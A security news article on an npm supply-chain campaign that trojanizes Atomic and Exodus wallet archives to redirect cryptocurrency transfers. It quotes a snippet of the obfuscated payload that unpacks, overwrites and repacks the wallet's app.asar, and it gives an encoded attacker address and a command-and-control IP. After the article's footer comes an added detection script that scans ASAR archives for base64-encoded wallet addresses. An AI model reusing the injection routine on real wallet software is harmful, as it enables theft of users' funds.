Threat Actors Hijack Legitimate Crypto Packages to Inject Malicious Code

Cybersecurity researchers have uncovered a malware campaign that targets cryptocurrency users through malicious npm packages. The campaign specifically targets users of the Atomic and Exodus wallets, hijacking transactions by injecting code into the wallet software that redirects funds to attacker-controlled addresses. It is the latest escalation in the ongoing targeting of cryptocurrency users through software supply chain attacks.

The attack begins when developers unknowingly install a malicious [npm package](https://cybersecuritynews.com/new-malicious-npm-packages-attack-amazon-slack/) in their projects. One package identified in this campaign is 'pdf-to-office', which appears legitimate but contains hidden malicious functionality. Once installed, the package examines the user's system for installed [cryptocurrency wallets](https://cybersecuritynews.com/cryptocore-cryptocurrency-scam-draining-wallets/) and injects code that can intercept and redirect transactions without the user's knowledge.

The impact is potentially devastating for victims: the injected code silently redirects transactions across multiple cryptocurrencies, including [Ethereum](https://cybersecuritynews.com/beginner-ethereum-tips/), Tron-based USDT, XRP, and Solana. It hijacks a transaction by replacing the legitimate recipient address with an attacker address at the moment the user attempts to send funds; the attacker addresses are stored in encoded form and decoded at the point of use.

ReversingLabs researchers [identified](https://www.reversinglabs.com/blog/atomic-and-exodus-crypto-wallets-targeted-in-malicious-npm-campaign) this campaign through their analysis of suspicious npm packages, noting multiple telltale signs of malicious behavior, including suspicious URL connections and code patterns similar to previously identified malicious packages. Their analysis found that the attackers use techniques to maintain persistence and evade detection. Because the hijack is written into the wallet's own application archive rather than living in the npm package, removing the package does not undo it; the wallet itself has to be restored from a clean vendor copy.

Technical examination reveals a multi-stage attack that begins with package installation and proceeds through wallet identification, extraction of the wallet's application archive, code injection, and ultimately transaction hijacking. The attackers use [obfuscation](https://cybersecuritynews.com/malware-obfuscation/) techniques to hide their intent, which makes detection harder for traditional security tools.

**Infection Mechanism and Code Injection**

The infection process begins when the malicious package executes its payload against installed wallet software.

![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo-1GjcoQDfF4EsDtu1wpVm8bv5e4LbnU7MUHQx5acZyyo7uZOpnVg_9UUReAjPXhqnhvq-P0G9Cpk5P6hcJiwA0yZgDNlTprC6gqCRGL_M-se3Xa6c1cGqDaGXZ6RF8eiHSPbNxvUX1NpN07Zg3Isl9c_JfloVadm6AQDsAswKwBfZg60fIDdW4JrrjI/s16000/Malicious%20payload%20(Source%20-%20Reversing%20Labs).webp)
Malicious payload (Source: Reversing Labs)

The malicious code first locates the wallet's application files on the system and then targets the ASAR archive format used by Electron-based applications. It looks for files at paths such as 'AppData/Local/Programs/atomic/resources/app.asar'. Once the archive is found, the malware extracts it, copies its own files over the wallet's JavaScript, and repacks the archive. The following snippet from the obfuscated payload, as quoted by ReversingLabs, illustrates this process (identifiers are the obfuscator's own):

```js
const _0x3b6acf = path.join(_0x3pbact, 'dist', 'electron');   // staging directory for the unpacked archive
if (fs.existsSync(_0x59578f)) {                                // _0x59578f: path to the wallet's app.asar
  await fs.mkdir(_0x3b6acf, { 'recursive': true });
  await asar.extractAll(_0x59578f, _0x3b6acf);                 // unpack the wallet's application archive
  await fs.copyFile(_0x190a5b, _0x2e871a);                     // overwrite wallet JavaScript with trojanized copies
  await fs.copyFile(_0x1a4254, _0xf71fca);
  await asar.createPackage(_0x3b6acf, _0x59578f);              // repack over the original app.asar
  await fs.rm(_0x3b6acf, { 'recursive': true, 'force': true }); // remove the staging directory
}
```

The injection targets specific JavaScript files within the wallet software, particularly vendor bundles such as 'vendors.64b69c3b00e2a7914733.js'.

![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbUX786pyA-8NIvV_0sWDpsFVBD3n4gCUdpBhMXrmjZt36-B5kU2XQqXjK-9abQ8jqxhBRODoIrcwr315lVuV6oghl7rQYz8sCys9JNYtCU1yNtnHk-PGCkS4jliOX7V25ht2B2PEyNksAq-x3EP7ovfClhr1gOsAwjSmuLcXNEdkO24ZWNZIYFW8ykmg/s16000/The%20difference%20between%20a%20legitimate%20and%20trojanized%20file%20(Source%20-%20Reversing%20Labs).webp)
The difference between a legitimate and trojanized file (Source: Reversing Labs)

The malware modifies the transaction-handling code so that the legitimate recipient address is replaced with an attacker-controlled one; the attacker addresses are stored as base64 strings and decoded when a transaction is built. For example, when a user attempts to send ETH, the code replaces the recipient with the decoded value of 'MHg0N2V1MEU4MUY10URiMjdGMDM0ZjRlYjEwRjk5MTIzMGY2NmY1M2ZB'.

After completing the infection, the malware reports to a command-and-control server at 178.156.149.109, sending installation status information that includes the user's home directory path. This lets the attackers track successful infections and potentially gather further information about compromised systems.

The post [Threat Actors Hijack Legitimate Crypto Packages to Inject Malicious Code](https://cybersecuritynews.com/threat-actors-hijack-legitimate-crypto-packages/) appeared first on [Cyber Security News](https://cybersecuritynews.com).
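The two mechanisms above, the repacked app.asar and the base64-stored attacker addresses, suggest a concrete check a responder can run against an installed wallet. The script below is an added example, not code from the article or from ReversingLabs: a stdlib-only Node program that parses an Electron ASAR archive with a minimal reader, then flags JavaScript entries carrying base64 strings that decode to wallet-address-shaped values for the chains the article names. The ASAR writer, the file paths, the vendor bundles and the placeholder addresses are all constructed for the demonstration and are not indicators from the campaign.

```javascript
// Added example (not the article's or ReversingLabs' code): scan an Electron
// app.asar for JavaScript files that embed base64-encoded wallet addresses.
// All sample data below is constructed; the addresses are placeholders.

// Address shapes per chain the article names. Order matters: the generic Solana
// base58 shape would also match a Tron or XRP address, so it is checked last.
const ADDRESS_PATTERNS = [
  ['ethereum', /^0x[0-9a-fA-F]{40}$/],
  ['tron',     /^T[1-9A-HJ-NP-Za-km-z]{33}$/],
  ['xrp',      /^r[1-9A-HJ-NP-Za-km-z]{24,34}$/],
  ['solana',   /^[1-9A-HJ-NP-Za-km-z]{32,44}$/],
];
const BASE64_TOKEN = /[A-Za-z0-9+/]{20,}={0,2}/g;

function classifyAddress(s) {
  for (const [chain, re] of ADDRESS_PATTERNS) if (re.test(s)) return chain;
  return null;
}

// Minimal ASAR reader (electron/asar layout): u32 LE 4 | u32 LE headerSize |
// pickle { u32 payloadLen, u32 jsonLen, json, pad to 4 } | concatenated file blobs.
// File offsets in the JSON are strings, relative to the end of the header.
function readAsar(buf) {
  const headerSize = buf.readUInt32LE(4);
  const jsonLen = buf.readUInt32LE(12);
  const header = JSON.parse(buf.toString('utf8', 16, 16 + jsonLen));
  const base = 8 + headerSize;
  const files = [];
  const walk = (node, prefix) => {
    for (const [name, entry] of Object.entries(node.files)) {
      const p = prefix ? `${prefix}/${name}` : name;
      if (entry.files) {
        walk(entry, p);
      } else {
        const start = base + Number(entry.offset);
        files.push({ path: p, data: buf.subarray(start, start + entry.size) });
      }
    }
  };
  walk(header, '');
  return files;
}

// Scan every .js entry for base64 tokens whose decoded form looks like an address.
function scanForEncodedAddresses(asarBuf) {
  const findings = [];
  for (const { path, data } of readAsar(asarBuf)) {
    if (!path.endsWith('.js')) continue;
    for (const token of data.toString('utf8').match(BASE64_TOKEN) || []) {
      const decoded = Buffer.from(token, 'base64').toString('utf8');
      const chain = classifyAddress(decoded);
      if (chain) findings.push({ path, chain, encoded: token, decoded });
    }
  }
  return findings;
}

// Tiny ASAR writer, used only to build the constructed sample archive below.
function buildAsar(fileMap) {
  const root = { files: {} };
  const blobs = [];
  let offset = 0;
  for (const [p, content] of Object.entries(fileMap)) {
    const parts = p.split('/');
    let node = root;
    for (const dir of parts.slice(0, -1)) {
      if (!node.files[dir]) node.files[dir] = { files: {} };
      node = node.files[dir];
    }
    const data = Buffer.from(content, 'utf8');
    node.files[parts[parts.length - 1]] = { size: data.length, offset: String(offset) };
    blobs.push(data);
    offset += data.length;
  }
  const json = Buffer.from(JSON.stringify(root), 'utf8');
  const pad = (4 - (json.length % 4)) % 4;
  const payloadLen = 4 + json.length + pad;
  const head = Buffer.alloc(16 + json.length + pad);
  head.writeUInt32LE(4, 0);
  head.writeUInt32LE(4 + payloadLen, 4);   // headerSize covers the pickle's own length field
  head.writeUInt32LE(payloadLen, 8);
  head.writeUInt32LE(json.length, 12);
  json.copy(head, 16);
  return Buffer.concat([head, ...blobs]);
}

// Constructed sample: a clean vendor bundle (carrying an unrelated base64 blob, so
// the scanner must not flag every long base64 string) and a trojanized one that
// swaps the recipient for attacker addresses decoded at send time.
const b64 = (s) => Buffer.from(s, 'utf8').toString('base64');
const ATTACKER_ETH = '0x' + 'ab'.repeat(20);   // placeholder, not a real indicator
const ATTACKER_TRON = 'T' + 'A'.repeat(33);    // placeholder, not a real indicator
const SAMPLE_ASAR = buildAsar({
  'dist/electron/vendors.clean.js':
    'function sendEth(tx){ return submit(tx.to, tx.value); }\n' +
    'const ICON = "iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJ";\n',
  'dist/electron/vendors.trojanized.js':
    `function sendEth(tx){ return submit(atob("${b64(ATTACKER_ETH)}"), tx.value); }\n` +
    `function sendTrx(tx){ return submit(Buffer.from("${b64(ATTACKER_TRON)}","base64").toString(), tx.value); }\n`,
  'package.json': '{"name":"wallet"}',
});

for (const f of scanForEncodedAddresses(SAMPLE_ASAR)) {
  console.log(`${f.path}: ${f.chain} address ${f.decoded} stored as ${f.encoded}`);
}
```

To run it against a real install, replace SAMPLE_ASAR with the bytes of the wallet's app.asar at the path the article quotes. The scan is a heuristic: it only catches addresses stored as base64, so the stronger check is to compare the hash of the installed app.asar with a fresh copy from the vendor, and any mismatch should be treated as a reason to reinstall the wallet rather than to remove the npm package alone.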

Related Tags:
- NAICS: 54 – Professional, Scientific, and Technical Services
- NAICS: 541 – Professional, Scientific, and Technical Services
- NAICS: 52 – Finance and Insurance
- NAICS: 518 – Computing Infrastructure Providers, Data Processing, Web Hosting, and Related Services
- NAICS: 523 – Securities, Commodity Contracts, and Other Financial Investments and Related Activities
- NAICS: 51 – Information
- Blog: Cybersecurity News
- TA0003 – Persistence
- File and Directory Discovery
